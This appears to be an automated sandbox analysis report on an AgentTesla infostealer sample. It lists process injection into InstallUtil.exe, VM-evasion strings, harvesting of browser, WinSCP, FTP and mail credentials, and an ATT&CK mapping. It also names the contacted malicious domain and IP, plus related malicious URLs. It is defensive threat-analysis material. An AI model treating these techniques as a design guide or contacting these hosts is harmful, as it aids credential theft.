                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594969Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594844Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594735Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594610Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594485Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594360Jump to behavior
                        Source: Xc501VOacR.exe, 00000000.00000002.2703482348.0000000005550000.00000004.08000000.00040000.00000000.sdmp, Xc501VOacR.exe, 00000000.00000002.2701624311.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, Xc501VOacR.exe, 00000000.00000002.2701624311.000000000403E000.00000004.00000800.00020000.00000000.sdmp, Xc501VOacR.exe, 00000000.00000002.2694977464.0000000002DF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxTray
                        Source: Xc501VOacR.exe, 00000000.00000002.2694977464.0000000002DF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q#SOFTWARE\VMware, Inc.\VMware VGAuth
                        Source: InstallUtil.exe, 00000004.00000002.3286884702.0000000001172000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: Xc501VOacR.exe, 00000000.00000002.2701624311.000000000403E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 2051979379GSOFTWARE\VMware, Inc.\VMware VGAuth
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Allocates memory in foreign processes
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                        Writes to foreign memory regions
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 42C000Jump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 42E000Jump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: D52008Jump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeQueries volume information: C:\Users\user\Desktop\Xc501VOacR.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Xc501VOacR.exe.3fead3a.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Xc501VOacR.exe.3fead3a.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Xc501VOacR.exe.3f9778a.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Xc501VOacR.exe.3fc126a.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Xc501VOacR.exe.4068598.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Xc501VOacR.exe.3fc126a.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Xc501VOacR.exe.3f9778a.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Xc501VOacR.exe.403e2ba.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Xc501VOacR.exe.4068598.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.2701624311.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2701624311.0000000003F6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.3285495307.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2701624311.000000000403E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000004.00000002.3287976378.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3924, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                        Tries to harvest and steal ftp login credentials
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                        Tries to steal Mail credentials (via file / registry access)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: Yara matchFile source: 00000004.00000002.3287976378.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3924, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Xc501VOacR.exe.3fead3a.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Xc501VOacR.exe.3fead3a.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Xc501VOacR.exe.3f9778a.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Xc501VOacR.exe.3fc126a.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Xc501VOacR.exe.4068598.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Xc501VOacR.exe.3fc126a.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Xc501VOacR.exe.3f9778a.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Xc501VOacR.exe.403e2ba.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Xc501VOacR.exe.4068598.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.2701624311.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2701624311.0000000003F6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.3285495307.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2701624311.000000000403E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000004.00000002.3287976378.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3924, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire Infrastructure1
                        Valid Accounts                        		121
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		1
                        Disable or Modify Tools                        		2
                        OS Credential Dumping                        		1
                        File and Directory Discovery                        		Remote Services11
                        Archive Collected Data                        		1
                        Encrypted Channel                        		1
                        Exfiltration Over Alternative Protocol                        		Abuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/Job1
                        Valid Accounts                        		1
                        Valid Accounts                        		1
                        Deobfuscate/Decode Files or Information                        		1
                        Credentials in Registry                        		24
                        System Information Discovery                        		Remote Desktop Protocol2
                        Data from Local System                        		1
                        Non-Standard Port                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                        Access Token Manipulation                        		2
                        Obfuscated Files or Information                        		Security Account Manager111
                        Security Software Discovery                        		SMB/Windows Admin Shares1
                        Email Collection                        		1
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook311
                        Process Injection                        		12
                        Software Packing                        		NTDS1
                        Process Discovery                        		Distributed Component Object ModelInput Capture11
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading                        		LSA Secrets141
                        Virtualization/Sandbox Evasion                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Masquerading                        		Cached Domain Credentials1
                        Application Window Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Valid Accounts                        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Access Token Manipulation                        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt141
                        Virtualization/Sandbox Evasion                        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron311
                        Process Injection                        		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                        Hidden Files and Directories                        		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        Xc501VOacR.exe74%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                        Xc501VOacR.exe100%AviraTR/AD.Nekark.myuaf
                        Xc501VOacR.exe100%Joe Sandbox ML

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://ftp.aminhacorretora.com.br100%Avira URL Cloudmalware
                        http://aminhacorretora.com.br100%Avira URL Cloudmalware
                        http://ns.adobe.c0/0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        aminhacorretora.com.br
                        		162.241.203.30
                        		truetrue
                          		unknown
                          ftp.aminhacorretora.com.br
                          		unknown
                          		unknowntrue
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://aminhacorretora.com.brInstallUtil.exe, 00000004.00000002.3287976378.0000000002D51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            http://ftp.aminhacorretora.com.brInstallUtil.exe, 00000004.00000002.3287976378.0000000002D51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameInstallUtil.exe, 00000004.00000002.3287976378.0000000002D51000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://ns.adobe.c0/Xc501VOacR.exe, 00000000.00000002.2704584943.00000000061D1000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              162.241.203.30
                              		aminhacorretora.com.brUnited States
                              		26337OIS1UStrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1569282
                              Start date and time:2024-12-05 17:21:29 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 6m 17s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:6
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:Xc501VOacR.exe
                              renamed because original name is a hash value
                              Original Sample Name:61b9f5a1e4ef18ed559b55f51d5c17b51c90c9a75fb5f6523b6243ae2f5bf70c.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@3/4@1/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 97%
                              • Number of executed functions: 186
                              • Number of non-executed functions: 44
                              Cookbook Comments:
                              • Found application associated with file extension: .exe

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: Xc501VOacR.exe

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              11:22:21API Interceptor218x Sleep call for process: Xc501VOacR.exe modified
                              11:23:33API Interceptor30184x Sleep call for process: InstallUtil.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              162.241.203.30S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                              • nossoplayer.me/admin/
                              RjGM2z2Z3gVHbRl.exeGet hashmaliciousFormBookBrowse
                              • www.enriquepimentel.site/eauu/?DZDL=WHu5pNat8uHfzRxaB9vtQ4eIh6FN4j/LlAnIasWF7xCzNp7gljTYY7GdEKRxmLt8YdbcyrQMPNW8Q0wryNhuApS+Kh6rZS0ucw==&XJE=v0GXajs0Cfa
                              PI5102295.exeGet hashmaliciousFormBookBrowse
                              • www.enriquepimentel.site/k056/?4hzh=z6Y8Z0&a8GP-0=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlL553wQlR/hos/LA==
                              SecuriteInfo.com.Trojan.GenericKD.61688138.7209.1529.exeGet hashmaliciousFormBookBrowse
                              • www.enriquepimentel.site/k056/?bH=ZR2t9tZxXpFp&j48x=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlL58jtUiF/uIknLA==
                              ZsFMADRfZB.exeGet hashmaliciousFormBookBrowse
                              • www.enriquepimentel.site/k056/?2dyL8P=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlO3cbHe0QClKYeKQ==&I6Ah=eFQ8RbYHBTF0_Z
                              SecuriteInfo.com.Trojan.DownLoaderNET.447.13310.17565.exeGet hashmaliciousFormBookBrowse
                              • www.enriquepimentel.site/k056/?t0GX=kdo4s&9rW=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlOwcbsUXIBubYeARc4v5180oiw
                              SecuriteInfo.com.Trojan.DownloaderNET.345.11377.31950.exeGet hashmaliciousFormBookBrowse
                              • www.enriquepimentel.site/k056/?9ro=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlOwcbsUXIBubYeARc4v5180oiw&q2ML=zTqLQN
                              SKMB610952.jsGet hashmaliciousFormBookBrowse
                              • www.enriquepimentel.site/k056/

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              aminhacorretora.com.brHangarskibenes.exeGet hashmaliciousGuLoaderBrowse
                              • 162.241.203.30

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              OIS1USumVoLahqZn.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                              • 162.241.203.30
                              tTXQS6DONV.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                              • 162.241.203.30
                              dY1ZxYJOz7.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                              • 162.241.203.30
                              i9QKJCpVZJ.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                              • 162.241.203.30
                              Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                              • 192.185.147.100
                              Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • 192.185.147.100
                              https://app.smartsheet.com/b/form/9141bdd4d7da45789170a7064a677627Get hashmaliciousHTMLPhisherBrowse
                              • 162.241.71.126
                              http://www.im-creator.com/viewer/vbid-2a496caa-iwgbu2zx/vbid-f9637b78-lok1anrmGet hashmaliciousUnknownBrowse
                              • 162.241.71.126
                              https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.comGet hashmaliciousUnknownBrowse
                              • 162.241.71.126
                              Isabella County Emergency Management-protected.pdfGet hashmaliciousHTMLPhisherBrowse
                              • 162.241.71.126

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Xc501VOacR.exe.log

                              Download File
                              Process:C:\Users\user\Desktop\Xc501VOacR.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1216
                              Entropy (8bit):5.34331486778365
                              Encrypted:false
                              SSDEEP:24:MLV1qE4x84qpE4KlKDE4KhKiKhIE4KnKIE4oKNzKoZAE4Kze0E4j:Mp1qHxv2HKlYHKh3oIHKntHo6hAHKzea
                              MD5:8275047EA04782E18195CE5F2F076225
                              SHA1:86FE553781E50EE2493A6D54A2F329FF94AD0DEE
                              SHA-256:302DE184C80A778557AA7F09DDCAB59FED5712B6BC617FDEAFE1E004021FFDDC
                              SHA-512:4F7B9BE379C98D5E9609D46FC0B473C66A977C3A081C60872CB8FE344C2785A285E9D9019D49515A6DC5D1E6EFF2D8DD5E5BA49086AF24F8A2F50E6B9EBE588B
                              Malicious:true
                              Reputation:moderate, very likely benign file
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                              C:\Users\user\AppData\Roaming\zi5iuluf.pn2\Chrome\Default\Network\Cookies

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                              Category:dropped
                              Size (bytes):20480
                              Entropy (8bit):0.8439810553697228
                              Encrypted:false
                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                              Malicious:false
                              Reputation:high, very likely benign file
